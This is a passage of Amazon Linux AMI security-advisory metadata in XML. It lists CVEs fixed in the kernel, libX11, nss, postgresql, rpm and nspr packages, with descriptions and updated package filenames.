kernel</title><issued date="2021-07-08 18:38:00" /><updated date="2024-04-25 16:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-46938:
In the Linux kernel, the following vulnerability has been resolved:
dm rq: fix double free of blk_mq_tag_set in dev remove after table load fails
CVE-2021-33200:
A flaw was found in kernel/bpf/verifier.c in BPF in the Linux kernel. An incorrect limit is enforced for pointer arithmetic operations which can be abused to perform out-of-bounds reads and writes in kernel memory, leading to local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-29650:
A denial-of-service (DoS) flaw was identified in the Linux kernel due to an incorrect memory barrier in xt_replace_table in net/netfilter/x_tables.c in the netfilter subsystem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29650" title="" id="CVE-2021-29650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33200" title="" id="CVE-2021-33200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46938" title="" id="CVE-2021-46938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1517</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1517: important priority package update for libX11</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31535:
A missing validation flaw was found in libX11. This flaw allows an attacker to inject X11 protocol commands on X clients, and in some cases, also bypass, authenticate (via injection of control characters), or potentially execute arbitrary code with permissions of the application compiled with libX11. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1961822: CVE-2021-31535 libX11: missing request length checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31535" title="" id="CVE-2021-31535" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.14.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.14.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.14.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1518</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1518: medium priority package update for nss</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25648:
A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability.
1887319: CVE-2020-25648 nss: TLS 1.3 CCS flood remote DoS Attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25648" title="" id="CVE-2020-25648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.85.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.85.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.85.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1519</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1519: important priority package update for postgresql92</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25695:
A flaw was found in postgresql. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894425: CVE-2020-25695 postgresql: Multiple features escape "security restricted operation" sandbox
CVE-2020-25694:
A flaw was found in postgresql. If a client application that creates additional database connections only reuses the basic connection parameters while dropping security-relevant parameters, an opportunity for a man-in-the-middle attack, or the ability to observe clear-text transmissions, could exist. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894423: CVE-2020-25694 postgresql: Reconnection can downgrade connection security settings
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25694" title="" id="CVE-2020-25694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25695" title="" id="CVE-2020-25695" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1520</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1520: important priority package update for postgresql96</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32027:
A flaw was found in postgresql. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbitrary bytes to a wide area of server memory. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1956876: CVE-2021-32027 postgresql: Buffer overrun from integer overflow in array subscripting calculations
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32027" title="" id="CVE-2021-32027" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython27" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.22-1.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1521</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1521: medium priority package update for rpm</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3421:
A flaw was found in the RPM package in the read functionality. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package or compromise an RPM repository, to cause RPM database corruption. The highest threat from this vulnerability is to data integrity.
1927747: CVE-2021-3421 rpm: unsigned signature header leads to string injection into an rpm database
CVE-2021-20271:
A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability.
1934125: CVE-2021-20271 rpm: Signature checks bypass via corrupted rpm package
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20271" title="" id="CVE-2021-20271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3421" title="" id="CVE-2021-3421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpm-apidocs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-apidocs-4.11.3-40.79.amzn1.noarch.rpm</filename></package><package name="rpm-debuginfo" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.11.3" release="40.79.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-cron-4.11.3-40.79.amzn1.noarch.rpm</filename></package><package name="rpm-python26" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python26-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-build-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-libs-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-python27" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python27-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-devel" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-sign" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-sign-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-python27" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python27-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-python26" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python26-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-build-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-libs-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-sign" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-sign-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.11.3-40.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1522</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1522: medium priority package update for nspr nss-softokn nss-util</title><issued date="2021-07-08 18:41:00" /><updated date="2021-07-12 21:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-6829:
A flaw was found in nss. Using the EM side-channel, it is possible to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication during the ECDSA signature generation, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1826187: CVE-2020-6829 nss: Side channel attack on ECDSA signature generation
CVE-2020-12403:
A flaw was found in the way CHACHA20-POLY1305 was implemented in NSS. When using multi-part Chacha20, it could cause out-of-bounds reads. This issue was fixed by explicitly disabling multi-part ChaCha20 (which was not functioning correctly) and strictly enforcing tag length. The highest threat from this vulnerability is to confidentiality and system availability.
1868931: CVE-2020-12403 nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read
CVE-2020-12402:
A flaw was found in NSS, where it is vulnerable to RSA key generation cache timing side-channel attacks. An attacker with sufficient access to mount cache timing attacks during the RSA key generation process could recover the private key. The highest threat to this flaw is to confidentiality.
1826231: CVE-2020-12402 nss: Side channel vulnerabilities during RSA key generation
CVE-2020-12401:
A flaw was found in nss. Using the EM side-channel, it is possible to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication during the ECDSA signature generation, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1851294: CVE-2020-12401 nss: ECDSA timing attack mitigation bypass
CVE-2020-12400:
A side-channel flaw was found in NSS, in the way P-384 and P-521 curves are used in the generation of EDSA signatures, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1853983: CVE-2020-12400 nss: P-384 and P-521 implementation uses a side-channel vulnerable modular inversion function
CVE-2019-17023:
A protocol downgrade flaw was found in Network Security Services (NSS). After a HelloRetryRequest has been sent, the client may negotiate a lower protocol than TLS 1.3, resulting in an invalid state transition in the TLS State Machine. If the client gets into this state, incoming Application Data records will be ignored.
1791225: CVE-2019-17023 nss: TLS 1.3 HelloRetryRequest downgrade request sets client into invalid state
CVE-2019-17006:
A vulnerability was discovered in nss where input text length was not checked when using certain cryptographic primitives. This could lead to a heap-buffer overflow resulting in a crash and data leak. The highest threat is to confidentiality and integrity of data as well as system availability.
1775916: CVE-2019-17006 nss: Check length of inputs for cryptographic primitives
CVE-2019-11756:
A use-after-free flaw was found in Mozilla Network Security Services (NSS) related to PK11 session handling. An attacker could use this flaw to execute arbitrary code with the permissions of the user running the application compiled with NSS.
1774835: CVE-2019-11756 nss: Use-after-free in sftk_FreeSession due to improper refcounting
CVE-2019-11727:
A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.
1730988: CVE-2019-11727 nss: PKCS#1 v1.5 signatures can be used for TLS 1.3
CVE-2019-11719:
When importing a curve25519 private key in PKCS#8format with leading 0x00 bytes, it is possible to trigger an out-of-bounds read in the Network Security Services (NSS) library. This could lead to information disclosure. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.
